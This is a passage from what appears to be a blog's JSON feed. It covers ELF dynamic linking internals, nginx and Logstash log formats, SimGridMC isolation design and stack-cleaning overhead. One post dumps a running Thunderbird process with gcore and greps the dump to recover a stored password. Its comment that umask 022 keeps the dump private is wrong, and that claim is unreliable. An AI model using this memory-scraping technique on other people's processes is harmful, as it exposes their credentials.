\n\n\n

Symbols

\n

The dynamic linker uses symbols to link ELF objects together:

\n\n

The .dynsym section (found under DT_SYMTAB in the dynamic section)\ncontains the list of symbols (imported as well as exported) necessary\nat runtime:

\n\n
$ readelf -s /bin/bash\n\nSymbol table '.dynsym' contains 2291 entries:\n   Num:    Value          Size Type    Bind   Vis      Ndx Name\n     0: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND\n     1: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND endgrent@GLIBC_2.2.5 (2)\n     2: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __ctype_toupper_loc@GLIBC_2.3 (3)\n     3: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND iswlower@GLIBC_2.2.5 (2)\n[...]\n    17: 0000000000000000     0 NOTYPE  WEAK   DEFAULT  UND _ITM_deregisterTMCloneTab\n[...]\n  1682: 00000000006fae48     0 NOTYPE  GLOBAL DEFAULT   25 __bss_start\n[...]\n  2283: 00000000004ccd10    16 OBJECT  GLOBAL DEFAULT   15 true_doc\n  2284: 0000000000496b00   165 FUNC    GLOBAL DEFAULT   13 mbsmbchar\n  2285: 00000000004764c0    47 FUNC    GLOBAL DEFAULT   13 sh_wrerror\n  2286: 00000000004491e0    18 FUNC    GLOBAL DEFAULT   13 restore_pgrp_pipe\n  2287: 00000000006f2e80     4 OBJECT  GLOBAL DEFAULT   24 interactive_comments\n  2288: 00000000004b5a40   490 FUNC    GLOBAL DEFAULT   13 tilde_expand_word\n  2289: 0000000000460600   307 FUNC    GLOBAL DEFAULT   13 array_shift\n  2290: 0000000000700bcc     4 OBJECT  GLOBAL DEFAULT   25 history_lines_this_sessio\n
\n\n\n

More information about the different fields of the symbol\ntable is in the appendix.

\n

Relocation

\n

A given ELF object defines some symbols and imports/uses some others. The\ndynamic linker needs to connect those references by placing the value of the\nsymbols (typically the effective address of the references variable/function)\nwhere the ELF object expects to find it. This process of resolving the symbol\nreferences is the relocation.

\n

The relocations tables can be show by readelf -r:

\n
$ readelf -r /bin/bash\nRelocation section '.rela.dyn' at offset 0x1c0b8 contains 8 entries:\n  Offset          Info           Type           Sym. Value    Sym. Name + Addend\n0000006f1ff8  006800000006 R_X86_64_GLOB_DAT 0000000000000000 __gmon_start__ + 0\n0000006fae80  01a100000005 R_X86_64_COPY     00000000006fae80 stdout + 0\n0000006fae88  07de00000005 R_X86_64_COPY     00000000006fae88 stdin + 0\n0000006fae90  06bc00000005 R_X86_64_COPY     00000000006fae90 UP + 0\n0000006fae98  01e200000005 R_X86_64_COPY     00000000006fae98 __environ + 0\n0000006faea0  060100000005 R_X86_64_COPY     00000000006faea0 PC + 0\n0000006faec0  042700000005 R_X86_64_COPY     00000000006faec0 BC + 0\n0000006faec8  06e400000005 R_X86_64_COPY     00000000006faec8 stderr + 0\n\nRelocation section '.rela.plt' at offset 0x1c178 contains 213 entries:\n  Offset          Info           Type           Sym. Value    Sym. Name + Addend\n0000006f2018  000100000007 R_X86_64_JUMP_SLO 0000000000000000 endgrent + 0\n0000006f2020  000200000007 R_X86_64_JUMP_SLO 0000000000000000 __ctype_toupper_loc + 0\n0000006f2028  000300000007 R_X86_64_JUMP_SLO 0000000000000000 iswlower + 0\n0000006f2030  000400000007 R_X86_64_JUMP_SLO 0000000000000000 sigprocmask + 0\n0000006f2038  000500000007 R_X86_64_JUMP_SLO 0000000000000000 __snprintf_chk + 0\n0000006f2040  000600000007 R_X86_64_JUMP_SLO 0000000000000000 getservent + 0\n0000006f2048  000700000007 R_X86_64_JUMP_SLO 0000000000000000 wcscmp + 0\n0000006f2050  000800000007 R_X86_64_JUMP_SLO 0000000000000000 putchar + 0\n[...]\n
\n\n\n

Each .rela.foo section defined relocations for the corresponding .foo\nsection:

\n\n

An entry in those tables is defined as:

\n
typedef struct\n{\n  ElfXX_Addr    r_offset;   /* Address */\n  ElfXX_Xword   r_info;     /* Relocation type and symbol index */\n  ElfXX_Sxword  r_addend;   /* Addend */\n} ElfXX_Rela;\n
\n\n\n

The fields of this table are:

\n\n

The dynamic linker finds the relocation table in the program header with\nDT_RELA (base address of the relocations) and DT_RELASZ (size in bytes):\nthis is usually the .rela.data section. The dynamic linker\napplies all those relocations in all loaded objects.

\n

Another relocation table can be applies lazily on demand (lazy binding). Those\nrelocations are indicated with DT_JMPREL (base address) and ST_PLTRELSZ:\nthis is usually the .rela.plt section. Those relocations are usually deferred\n(unless lazy binding is disabled with LD_BIND_NOW is set) in order to speed up\nthe initialisation of the program.

\n

Initialisation functions

\n

The linker then calls the initialisation functions of the shared objects.\nEach function is passed the argc, argv and envp parameters.

\n

They are found and executed with (in this order)

\n\n

The constructors of all dependencies of a shared object are called before the\nconstructor of this shared object.

\n

The initialisation functions of the executable are not called by the dynamic\nlinker but by the __libc_csu_init function (for the GNU libc) which is a part\nof the libc which is statically linked in the executable:

\n

Q: what does CSU means?

\n
const size_t size = __init_array_end - __init_array_start;\nfor (size_t i = 0; i < size; i++)\n  (*__init_array_start [i]) (argc, argv, envp);\n
\n\n\n

The preinitialisation functions of the executable, however, are called by the\ndynamic linker.

\n

See the appendix for how to define initialisation functions.

\n

Entry point

\n

The dynamic linker then calls the entry point specified in the ELF header of the\nexecutable.

\n

In our bash example, we can check that this entry point is in the .text\nsection and is the _start functions (in the symbols table):

\n
$ readelf -h /bin/bash\nELF Header:\n  [...]\n  Entry point address:               0x4205bc\n  [...]\n\n$ readelf -S /bin/bash\nThere are 27 section headers, starting at offset 0xfaf38:\n\nSection Headers:\n  [Nr] Name              Type             Address           Offset\n       Size              EntSize          Flags  Link  Info  Align\n[...]\n  [13] .text             PROGBITS         000000000041e2f0  0001e2f0\n       0000000000099c42  0000000000000000  AX       0     0     16\n[...]\n\n$ readelf -s /bin/bash\nSymbol table '.dynsym' contains 2291 entries:\n   Num:    Value          Size Type    Bind   Vis      Ndx Name\n[...]\n  1726: 00000000004205bc     0 FUNC    GLOBAL DEFAULT   13 _start\n
\n\n\n

Program startup

\n

The rest of the initialisation process is not done by dynamic linker\nanymore:

\n
    \n
  1. \n

    _start calls the libc\n __libc_start_main;

    \n
  2. \n
  3. \n

    __libc_start_main calls the executable __libc_csu_init (statically-linked\n part of the libc);

    \n
  4. \n
  5. \n

    __libc_csu_init calls the executable constructors (and other initialisatios);

    \n
  6. \n
  7. \n

    __libc_start_main calls the executable main();

    \n
  8. \n
  9. \n

    __libc_start_main calls the executable exit().

    \n
  10. \n
\n

However, the dynamic linker can still be used later for two reasons:

\n\n

Conclusion

\n

Advanced topics not covered here:

\n\n

Appendix: more details

\n

Symbol fields

\n

Symbols have an associated type such as STT_FUNC for functions,\nSTT_OBJECT for data

\n

The Ndx fields is the number of the section the symbol is in.

\n

The @ thingie in the symbol names is related to symbol versioning which is an\nextension.

\n

Binding

\n

The binding is used by the static linker and defines how the symbols are\nvisible across different .o files of the same final object:

\n\n
void  __attribute__((weak)) foo(void) {}\n
\n\n\n

Visibility

\n

The visibility defines the visibility of the symbol for the dynamic linker:

\n\n

In GCC the default visibility can be\nchanged\nwith -fvisibility=hidden for a given file and can be changed on a\nper-symbol basis with the visibility attribute:

\n
void  __attribute__((visibility(\"default\"))) foo(void) {}\n
\n\n\n

Initialisation (and preinitialisation) functions

\n
void pre_init() {\n  abort();\n}\n\nvoid (*const preinit_array []) (void)\n     __attribute__ ((section (\".preinit_array\"),\n             aligned (sizeof (void *)))) =\n{\n  &pre_init\n};\n\n__attribute__((constructor))\nint init() {\n  abort();\n}\n
\n\n\n

Appendix: dynamic loading and dynamic symbol resolution

\n

The functions related to dynamic loading of libraries (dlopen()) and\ndynamic symbol resolution (dlsym()) are implemented in libdl.so.\nThe loading and linking of ELF shared-objects and the resolution of\nthe symbols are handled by the dynamic linker: libdl.so delegate\nmost of its job to the dynamic linker.

\n

dlopen()

\n

This is the core of the GNU dlopen() (in dlfcn/dlopen.c):

\n
#ifndef SHARED\n# define GLRO(name) _##name\n#else\n# ifdef IS_IN_rtld\n#  define GLRO(name) _rtld_local_ro._##name\n# else\n#  define GLRO(name) _rtld_global_ro._##name\n# endif\n\nstatic void\ndlopen_doit (void *a)\n{\n  struct dlopen_args *args = (struct dlopen_args *) a;\n\n  if (args->mode & ~(RTLD_BINDING_MASK | RTLD_NOLOAD | RTLD_DEEPBIND\n                     | RTLD_GLOBAL | RTLD_LOCAL | RTLD_NODELETE\n                     | __RTLD_SPROF))\n    GLRO(dl_signal_error) (0, NULL, NULL, _(\"invalid mode parameter\"));\n\n  args->new = GLRO(dl_open) (args->file ?: \"\", args->mode | __RTLD_DLOPEN,\n                             args->caller,\n                             args->file == NULL ? LM_ID_BASE : NS,\n                             __dlfcn_argc, __dlfcn_argv, __environ);\n}\n
\n\n\n

The dynamic linker expose a set of callbacks to the application in the\n_rtld_global_ro object:

\n
struct rtld_global_ro {\n  // [...]\n  void *(*_dl_open) (const char *file, int mode, const void *caller_dlopen,\n                     Lmid_t nsid, int argc, char *argv[], char *env[]);\n  void (*_dl_close) (void *map);\n  // [...]\n};\n
\n\n\n

This _rtld_global_ro object is defined in libdl.so:

\n
\n25: 0000000000220cc0   304 OBJECT  GLOBAL DEFAULT   15 _rtld_global_ro@@GLIBC_PRIVATE\n
\n\n

and used in libdl.so:

\n
\n13: 0000000000000000     0 OBJECT  GLOBAL DEFAULT  UND _rtld_global_ro@GLIBC_PRIVATE (7)\n
\n\n

dlclose() and dlmopen() use the same mechanism.

\n

dlsym()

\n

The dlym() function uses directly the _dl_sym() function of ld.so:

\n
static void\ndlsym_doit (void *a)\n{\n  struct dlsym_args *args = (struct dlsym_args *) a;\n\n  args->sym = _dl_sym (args->handle, args->name, args->who);\n}\n
\n\n\n

dlvsum() and dladdr() use the same mechanism.

\n

References

\n"}, {"id": "http://www.gabriel.urdhr.fr/2015/01/15/recover-a-password-in-a-process-memory/", "title": "Recover a (forgotten) password in a process memory", "url": "https://www.gabriel.urdhr.fr/2015/01/15/recover-a-password-in-a-process-memory/", "date_published": "2015-01-15T00:00:00+01:00", "date_modified": "2015-01-15T00:00:00+01:00", "tags": ["computer", "system"], "content_html": "

Today, I managed to forget a password but I had a Icedove (Thunderbird) process\nrunning containing the password.

\n

The first thing to do is to take a core dump of the process:

\n
# I don't want other people to read my core dump:\numask 022\n\n# I don't want my core dump to be written on disk, let's go on a tmpfs:\ncd /tmp\n\ngcore -o core $(pgrep icedove)\n
\n\n\n

The basic idea is to use use strings to extract all the strings in the core\ndump and filter out as much entries as possible: you look start strings core |\nuniq | less and add filters in the pipeline to remove as many entries as\npossible.

\n

I ended up with something similar to this:

\n
strings core.2169 |\n# Remove some useless stuff:\ngrep -v ZZZ | grep -v /usr | grep -v /lib | grep -v /bin |\n# Add constraints on the characters used in the password:\ngrep [0-9] | grep [a-z] | grep [A-Z] |\n# Add constraints on the length of the password:\ngrep -Ev '.{20}' | grep -E '.{5}' |\n# Let's look at what's left:\nuniq | less\n
\n\n\n

There were still, more than 36000 entries but I searched a password that I\nremembered and the forgotten password was a few line around the other one.\n\"\ud83d\ude04\"

\n

Don't forget to remove (or shred) the core file:

\n
rm core\n
"}, {"id": "http://www.gabriel.urdhr.fr/2015/01/11/logstash-vhost-combined/", "title": "nginx, Logstash and vhost-combined log format", "url": "https://www.gabriel.urdhr.fr/2015/01/11/logstash-vhost-combined/", "date_published": "2015-01-11T00:00:00+01:00", "date_modified": "2015-01-11T00:00:00+01:00", "tags": ["computer", "log", "http", "apache", "nginx"], "content_html": "

The Apache HTTP server ships with a\nsplit-logfile\nutility which parses Combined Log File entries prefixed with the virtual host:\nsome notes about this and its inclusion in nginx and\nlogstash.

\n

Apache

\n

This is the format expected by split-logfile:

\n
www.gabriel.urdhr.fr ::1 - - [08/Jan/2015:23:51:34 +0100] \"GET / HTTP/1.1\" 304 0 \"-\" \"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.3.0\"\n
\n\n\n

It can be configured in Apache with:

\n
LogFormat \"%v %h %l %u %t \\\"%r\\\" %>s %b \\\"%{Referer}i\\\" \\\"%{User-agent}i\\\"\" combined_vhost\n\n# For reference those are the definitions fot the standard log formats:\nLogFormat \"%h %l %u %t \\\"%r\\\" %>s %b\" common\nLogFormat \"%h %l %u %t \\\"%r\\\" %>s %b \\\"%{Referer}i\\\" \\\"%{User-agent}i\\\"\" combined\n
\n\n\n

The split-logfile reads this and generates separate log files for each\nvirtual-host:

\n
/usr/sbin/split-logfile < access.log\n
\n\n\n

Parsing with logstash or grok

\n

Logstash (or any grok-based software)\ncan be taught to process this in patterns/grok-patterns with:

\n
COMBINED_VHOST %{HOSTNAME:vhost} %{COMBINEDAPACHELOG}\n
\n\n\n

which extends the predefined formats:

\n
COMMONAPACHELOG %{IPORHOST:clientip} %{USER:ident} %{USER:auth} \\[%{HTTPDATE:timestamp}\\] \"(?:%{WORD:verb} %{NOTSPACE:request}(?: HTTP/%{NUMBER:httpversion})?|%{DATA:rawrequest})\" %{NUMBER:response} (?:%{NUMBER:bytes}|-)\nCOMBINEDAPACHELOG %{COMMONAPACHELOG} %{QS:referrer} %{QS:agent}\n
\n\n\n

Used in a configuration file such as:

\n
input {\n  file {\n    path => ['/var/log/nginx/access.log']\n    start_position => beginning\n  }\n}\n\nfilter {\n  mutate {\n    replace => {\n      \"type\" => \"access\"\n    }\n  }\n  grok {\n    match => {\n      \"message\" => \"%{COMBINED_VHOST}\"\n    }\n  }\n}\n\noutput {\n  stdout {\n    codec => rubydebug\n  }\n}\n
\n\n\n

nginx

\n

nginx can be configured to generate a similar type of log with:

\n
log_format combined_vhost '$server_name $remote_addr - $remote_user [$time_local] '\n                    '\"$request\" $status $body_bytes_sent '\n                    '\"$http_referer\" \"$http_user_agent\"';\n\n# For reference:\nlog_format common   '$remote_addr - $remote_user [$time_local] '\n                    '\"$request\" $status $body_bytes_sent ';\n# This one is predefined:\nlog_format combined '$remote_addr - $remote_user [$time_local] '\n                    '\"$request\" $status $body_bytes_sent '\n                    '\"$http_referer\" \"$http_user_agent\"';\n
\n\n\n

Logging the requested virtual host

\n

Those configurations log the configured virtual host, not the requested virtual\nhost (the content of the Host HTTP header). If you want to log the content of\nthe Host HTTP header, you can use:

\n\n

As the header can contain a space, they should be quoted. split-logfile won't\nwork well and the logstash/grok pattern will have to be adapted.

\n

Appendix: other web logging stuff

\n"}, {"id": "http://www.gabriel.urdhr.fr/2015/01/06/simgrid-mc-isolation/", "title": "Better isolation for SimGridMC", "url": "https://www.gabriel.urdhr.fr/2015/01/06/simgrid-mc-isolation/", "date_published": "2015-01-06T00:00:00+01:00", "date_modified": "2015-01-06T00:00:00+01:00", "tags": ["simgrid", "system", "computer", "linker", "linux", "simulation", "elf"], "content_html": "

In an attempt to simplify the development around the SimGrid\nmodel-checker, we were thinking about moving the model-checker out in\na different process. Another different approach would be to use a\ndynamic-linker isolation of the different components of the process.\nHere's a summary of the goals, problems and design issues surrounding\nthese topics.

\n

Current state

\n

SimGrid architecture

\n

The design if the SimGrid simulator is based on the design of a\noperating system.

\n

In a typical OS, we have a kernel managing a global state and a\nseveral userspace processes running on top of the kernel. The kernel\nschedules the execution of the different processes (and their\nthreads) on the available CPUs. The kernel provides an API to the\nprocesses made of several system calls.

\n
\n \n \n Process\n \n Process\n \n Process\n \n Process\n\n \n System calls\n \n OS kernel\n \n
\n\n

SimGrid simulated a distributed system: it simulates a network and let\nthe different processes of the simulated system use this simulated\nnetwork. Each simulated process runs on top of the SimGrid kernel.\nThe SimGrid kernel schedules the execution of the different processes\non the available OS threads. The SimGrid kernel provides an API to the\nprocesses made of several simulation calls.

\n
\n \n \n Process\n \n Process\n \n Process\n \n Process\n \n Simulation calls\n\n \n SimGrid kernel\n \n
\n\n

In order to reduce the cost of context switching between the different\nprocesses, in the current implementation of SimGrid all the simulated\nprocesses and the SimGrid kernel are in the same OS process: there is\nno MMU-enforced separation of memory between the simulated processes\nbut they are expected to only communicate between each other using\nonly the means provided by the SimGrid kernel (the simulation calls)\nand should not share mutable memory.

\n
\n \n \n \n Process\n \n Process\n \n Process\n \n Process\n\n \n Simulation calls\n \n SimGrid kernel\n \n \n \n \n System calls\n \n OS kernel\n \n \n
\n\n

The SimGrid kernel has a dedicated stack and each simulated process has its\nown stack: cooperative multitasking (fibers, ucontext) is used to\nswitch between the different contexts (SimGrid kernel/process) and is\nused by the SimGrid kernel to schedule the execution of the different\nprocesses.

\n

The same (libc) heap is shared between the SimGrid kernel and the\nsimulated processes.

\n

SimGridMC architecture

\n

The SimGrid model-checker is a dynamic analysis component for SimGrid.\nIt explores the different possible interleavings of execution of the\nsimulated processes (depending on the execution of their transitions\ni.e. the different possible orderings of their communications).

\n

In order to do this, the MC saves at each node of the graph of the\npossible executions the state of the system:

\n\n

Those states are then used to:

\n\n

In the current implementation, the model-checker lives in the same\nprocess as the main SimGrid process (the SimGrid kernel and the\nprocesses):

\n
\n \n \n \n\n \n Process\n \n Process\n \n Process\n \n Process\n \n Simulation calls\n \n SimGrid kernel\n \n Model-checker\n\n \n \n
\n\n

Multiple heaps

\n

However, the model-checker needs to maintain its own\nstate: the state of the model-checker must not be saved, compared and\nrestored with the rest of the state.

\n

In order to do this, the state of the model-checker is maintained in a\nsecond heap:

\n\n

This is implemented by overriding the malloc(), free() and friends\nin order to support multiple heap. A global variable is used to choose\nthe current working heap:

\n
// Simplified code\nxbt_mheap_t __mmalloc_current_heap = NULL;\n\nvoid *malloc(size_t n)\n{\n  return mmalloc(__mmalloc_current_heap, n);\n}\n\nvoid free(void *ptr)\n{\n  return mfree(__mmalloc_current_heap, ptr);\n}\n
\n\n\n

Limitation of the approach

\n

The current implementation is complicated and not easy to understand and\nmaintain:

\n\n

A first motivation for modifying the architecture of SimGridMC, is to incraase\nthe maintainability of the SimGridMC codebase.

\n

Another related goal is to simplify the debugging experience (of the simulated\napplication, the SimGrid kernel and the model-checker). For example, the current\nversion of SimGridMC does not work under valgrind. A solution which would\nprovide a more powerful debugging experience would be a valuable tool for the\nSimGridMC devs but more importantly for the users of SimGridMC.

\n

Process-based isolation

\n

For all these reasons, we would like to move the model-checker in a\nseparate process: a model-checker process maintains the model-checker\nstate and control the execution of a model-checked process.

\n
\n \n \n \n Process\n \n Process\n \n Process\n \n Process\n\n \n Simulation calls\n \n SimGrid kernel\n \n \n \n \n Model-checking interface\n \n Model-checker\n \n \n
\n\n

Memory snapshot/restoration

\n

The snapshoting/restoration of the model-checked process memory can be\ndone using /proc/${pid}/mem or process_vm_readv() and\nprocess_vm_writev().

\n

As long as the OS threads are living on stacks which are not managed\nby the state snapshot/restoration mechanism, they will not be\naffected: we must take care that the OS threads switch to unmanaged\nstacks when we are doing the state snapshots/restorations.

\n

Another solution would be to use ptrace() with PTRACE_GETREGSET\nand PTRACE_SETREGSET in order to snapshot/restore the registers of\neach thread but we would like to avoid this in order to be able to use\nptrace() for debugging or other\npurposes.

\n

File descriptors restoration

\n

Linux does not provide a way to change the file descriptors of another process:\nthe restoration of the file descriptors must be done in the taret OS process\nand cannot be done from the model-checker process. Cooperation of the model-checked\nprocess is needed for the file descriptors restoration.

\n

We could abuse ptrace()-based syscall rewriting techniques or some\nsort of parasite injection in order to\nachieve this.

\n

Dynamic-linker based isolation

\n

Another idea would be to create a custom dynamic linker with namespace\nsupport in order to be able to link multiple instances of the same\nlibrary and provide isolation between different parts of the process.

\n

This could be used to:

\n\n

Prior art in DCE with dlmopen()

\n

It turns out that\nDCE\nalready uses a similar approach to load multiples application instances along\nwith Linux kernel implementations (and its network stack)\non top of the NS3 packet level network simulator\nin the same process:\nthe applications and Linux kernel are compiled as shared objects, the latter\nforming a Library OS liblinux.so shared object\nand loaded multiple times in the same process alongside with the NS3 instance.

\n

Among several alternative\nstrategies,\nDCE uses the dlmopen()\nfunction. This is a variant of\ndlopen() originating from\nSunOS/Solaris and\nimplemented on the GNU userland which allows to load dynamic libraries in\nseparated namespaces:

\n\n

An alternative implementation of the ld.so dynamic linker,\nelf-loader, is used which\nprovides additional\nfeatures:

\n\n

More information about dlmopen()\ncan be found in old version of Sun\nLinkers and Libraries Guide.

\n

A custom dynamic loader/linker on top of libc

\n

However, I was envisioning something slightly different: instead of\nwriting a replacement of ld.so (using raw system calls), I was\nthinking about building the custom dynamic linker on top of libc and\nlibdl in order to be able to use libc (malloc()), libdl and\nlibelf instead of using the raw system calls.

\n

Impact on debuggability

\n

In a split process design, the model-checker could be a quite standard\napplication avoiding any black magic (introspection with /prov/self/maps and\nDWARF, snapshoting/restoration of the state with memcpy(), custom mmalloc()\nimplementation with multiple heaps). Once a relevant trajectory of the\nmodel-checked application has been identified, it could be replayed outside of\nthe model-checker and debugged in this simpler mode.

\n

However, having a single process could lead to a better debugging experience:\nby being able to combines breakpoints in the model-checker, the SimGrid kernel\nand the simulated application with conditions spanning all those components.

\n

At the same time,\nusing multiple dynamic-linking namespaces could make the debugging\nexperience more complicated. I'm not sure how well it is supported by the\ndifferent available debugging tools. The DCE tools seems to show that it is\nreasonably well supported by\nGDB\nand\nvalgrind.

\n

Conclusion

\n

So we have two possible directions:

\n\n

The first solution provides a better isolation of the model-checker.\nThe second solution is closer to the current implementation and\nshould have better performances by avoiding the context switches and\nIPC in favour of direct memory access and function calls. Moreover, the\ndynamic-linker-based isolation could be reused for other parts of the\nprojects (such as the isolation of the simulated MPI processes).

\n

It is not clear which solution would provide the better debugging experience for\nthe user and which solution would be better for the maintainability of\nSimGridMC.

\n

Appendix: dlmopen() quick demo

\n

This simple program creates three new namespaces and loads libpthread in those\nnamespaces:

\n
#define _GNU_SOURCE\n#include <dlfcn.h>\n\n#include <unistd.h>\n\nint main(int argc, const char** argv)\n{\n  size_t i;\n  for (i=0; i!=3; ++i) {\n    void* x = dlmopen(LM_ID_NEWLM, \"libpthread.so.0\", RTLD_NOW);\n    if (!x)\n      return 1;\n  }\n  while(1) sleep(200000);\n  return 0;\n}\n
\n\n\n

We see that libpthread is loaded thrice. Each instance has its own libc\ninstance as well (and a fourth one is loaded for the main program):

\n
00400000-00401000 r-xp 00000000 08:06 7603474                            /home/myself/temp/a.out\n00600000-00601000 rw-p 00000000 08:06 7603474                            /home/myself/temp/a.out\n0173a000-0175b000 rw-p 00000000 00:00 0                                  [heap]\n7fca7ac7d000-7fca7ae1c000 r-xp 00000000 08:01 2626010                    /lib/x86_64-linux-gnu/libc-2.19.so\n7fca7ae1c000-7fca7b01c000 ---p 0019f000 08:01 2626010                    /lib/x86_64-linux-gnu/libc-2.19.so\n7fca7b01c000-7fca7b020000 r--p 0019f000 08:01 2626010                    /lib/x86_64-linux-gnu/libc-2.19.so\n7fca7b020000-7fca7b022000 rw-p 001a3000 08:01 2626010                    /lib/x86_64-linux-gnu/libc-2.19.so\n7fca7b022000-7fca7b026000 rw-p 00000000 00:00 0\n7fca7b026000-7fca7b03e000 r-xp 00000000 08:01 2625992                    /lib/x86_64-linux-gnu/libpthread-2.19.so\n7fca7b03e000-7fca7b23d000 ---p 00018000 08:01 2625992                    /lib/x86_64-linux-gnu/libpthread-2.19.so\n7fca7b23d000-7fca7b23e000 r--p 00017000 08:01 2625992                    /lib/x86_64-linux-gnu/libpthread-2.19.so\n7fca7b23e000-7fca7b23f000 rw-p 00018000 08:01 2625992                    /lib/x86_64-linux-gnu/libpthread-2.19.so\n7fca7b23f000-7fca7b243000 rw-p 00000000 00:00 0\n7fca7b243000-7fca7b3e2000 r-xp 00000000 08:01 2626010                    /lib/x86_64-linux-gnu/libc-2.19.so\n7fca7b3e2000-7fca7b5e2000 ---p 0019f000 08:01 2626010                    /lib/x86_64-linux-gnu/libc-2.19.so\n7fca7b5e2000-7fca7b5e6000 r--p 0019f000 08:01 2626010                    /lib/x86_64-linux-gnu/libc-2.19.so\n7fca7b5e6000-7fca7b5e8000 rw-p 001a3000 08:01 2626010                    /lib/x86_64-linux-gnu/libc-2.19.so\n7fca7b5e8000-7fca7b5ec000 rw-p 00000000 00:00 0\n7fca7b5ec000-7fca7b604000 r-xp 00000000 08:01 2625992                    /lib/x86_64-linux-gnu/libpthread-2.19.so\n7fca7b604000-7fca7b803000 ---p 00018000 08:01 2625992                    /lib/x86_64-linux-gnu/libpthread-2.19.so\n7fca7b803000-7fca7b804000 r--p 00017000 08:01 2625992                    /lib/x86_64-linux-gnu/libpthread-2.19.so\n7fca7b804000-7fca7b805000 rw-p 00018000 08:01 2625992                    /lib/x86_64-linux-gnu/libpthread-2.19.so\n7fca7b805000-7fca7b809000 rw-p 00000000 00:00 0\n7fca7b809000-7fca7b9a8000 r-xp 00000000 08:01 2626010                    /lib/x86_64-linux-gnu/libc-2.19.so\n7fca7b9a8000-7fca7bba8000 ---p 0019f000 08:01 2626010                    /lib/x86_64-linux-gnu/libc-2.19.so\n7fca7bba8000-7fca7bbac000 r--p 0019f000 08:01 2626010                    /lib/x86_64-linux-gnu/libc-2.19.so\n7fca7bbac000-7fca7bbae000 rw-p 001a3000 08:01 2626010                    /lib/x86_64-linux-gnu/libc-2.19.so\n7fca7bbae000-7fca7bbb2000 rw-p 00000000 00:00 0\n7fca7bbb2000-7fca7bbca000 r-xp 00000000 08:01 2625992                    /lib/x86_64-linux-gnu/libpthread-2.19.so\n7fca7bbca000-7fca7bdc9000 ---p 00018000 08:01 2625992                    /lib/x86_64-linux-gnu/libpthread-2.19.so\n7fca7bdc9000-7fca7bdca000 r--p 00017000 08:01 2625992                    /lib/x86_64-linux-gnu/libpthread-2.19.so\n7fca7bdca000-7fca7bdcb000 rw-p 00018000 08:01 2625992                    /lib/x86_64-linux-gnu/libpthread-2.19.so\n7fca7bdcb000-7fca7bdcf000 rw-p 00000000 00:00 0\n7fca7bdcf000-7fca7bf6e000 r-xp 00000000 08:01 2626010                    /lib/x86_64-linux-gnu/libc-2.19.so\n7fca7bf6e000-7fca7c16e000 ---p 0019f000 08:01 2626010                    /lib/x86_64-linux-gnu/libc-2.19.so\n7fca7c16e000-7fca7c172000 r--p 0019f000 08:01 2626010                    /lib/x86_64-linux-gnu/libc-2.19.so\n7fca7c172000-7fca7c174000 rw-p 001a3000 08:01 2626010                    /lib/x86_64-linux-gnu/libc-2.19.so\n7fca7c174000-7fca7c178000 rw-p 00000000 00:00 0\n7fca7c178000-7fca7c17b000 r-xp 00000000 08:01 2626017                    /lib/x86_64-linux-gnu/libdl-2.19.so\n7fca7c17b000-7fca7c37a000 ---p 00003000 08:01 2626017                    /lib/x86_64-linux-gnu/libdl-2.19.so\n7fca7c37a000-7fca7c37b000 r--p 00002000 08:01 2626017                    /lib/x86_64-linux-gnu/libdl-2.19.so\n7fca7c37b000-7fca7c37c000 rw-p 00003000 08:01 2626017                    /lib/x86_64-linux-gnu/libdl-2.19.so\n7fca7c37c000-7fca7c39c000 r-xp 00000000 08:01 2625993                    /lib/x86_64-linux-gnu/ld-2.19.so\n7fca7c568000-7fca7c56b000 rw-p 00000000 00:00 0\n7fca7c59a000-7fca7c59c000 rw-p 00000000 00:00 0\n7fca7c59c000-7fca7c59d000 r--p 00020000 08:01 2625993                    /lib/x86_64-linux-gnu/ld-2.19.so\n7fca7c59d000-7fca7c59e000 rw-p 00021000 08:01 2625993                    /lib/x86_64-linux-gnu/ld-2.19.so\n7fca7c59e000-7fca7c59f000 rw-p 00000000 00:00 0\n7fffa8481000-7fffa84a2000 rw-p 00000000 00:00 0                          [stack]\n7fffa85f5000-7fffa85f7000 r-xp 00000000 00:00 0                          [vdso]\n7fffa85f7000-7fffa85f9000 r--p 00000000 00:00 0                          [vvar]\nffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]\n
\n\n\n

The new namespaces are probably not fully functional in this state:\nthere are probably conflicts to solve in the different instances. For example,\neach libc probably tries to manage the same heap with sbrk().

"}, {"id": "http://www.gabriel.urdhr.fr/2014/11/03/not-cleaning-the-stack/", "title": "Avoiding to clean the stack", "url": "https://www.gabriel.urdhr.fr/2014/11/03/not-cleaning-the-stack/", "date_published": "2014-11-03T00:00:00+01:00", "date_modified": "2014-11-03T00:00:00+01:00", "tags": ["computer", "simgrid", "compilation", "assembly", "x86_64"], "content_html": "

In two previous posts, I looked into cleaning the stack frame of a\nfunction before using it by adding assembly at the beginning of each\nfunction. This was done either by modifying LLVM with a custom\ncodegen pass or by\nrewriting the\nassembly\nbetween the compiler and the assembler. The current implementation\nadds a loop at the beginning of every function. We look at the impact\nof this modification on the performance on the application.

\n

Update: this is an updated version of the post with fixed\ncode and updated results (the original version of the code was\nbroken).

\n

Initial results

\n

Here are the initial results:

\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
TestNormalStack cleaning
ctest (complete testsuite)348.06s387.53s
ctest -R mc-bugged1-liveness-visited-ucontext-sparse1.53s2.00s
run_test comm dup 442.54s127.80s
\n

On big problems, the overhead of the stack-cleaning modification\nbecomes very important.

\n

Optimisation

\n

We would like to avoid the overhead of the stack-cleaning code. In order\nto do this we can use the following facts:

\n\n

Thus, we can disable stack-cleaning if we detect that we are not\nexecuting the application code. This can be implemented in two ways:

\n\n

In order to evaluate, the efficiency of this approach, we use a simple\ncomparison of %rsp with a constant value:

\n
    movq $0x7fff00000000, %r11\n    cmpq %r11, %rsp\n    jae .Lstack_cleaner_done0\n    movabsq $3, %r11\n.Lstack_cleaner_loop0:\n    movq    $0, -32(%rsp,%r11,8)\n    subq    $1, %r11\n    jne     .Lstack_cleaner_loop0\n.Lstack_cleaner_done0:\n    # Main code of the function goes here\n
\n\n\n

The value is hardcoded in this prototype but it could be loaded from a\nglobal variable instead.

\n

Here are the results with this optimisation:

\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
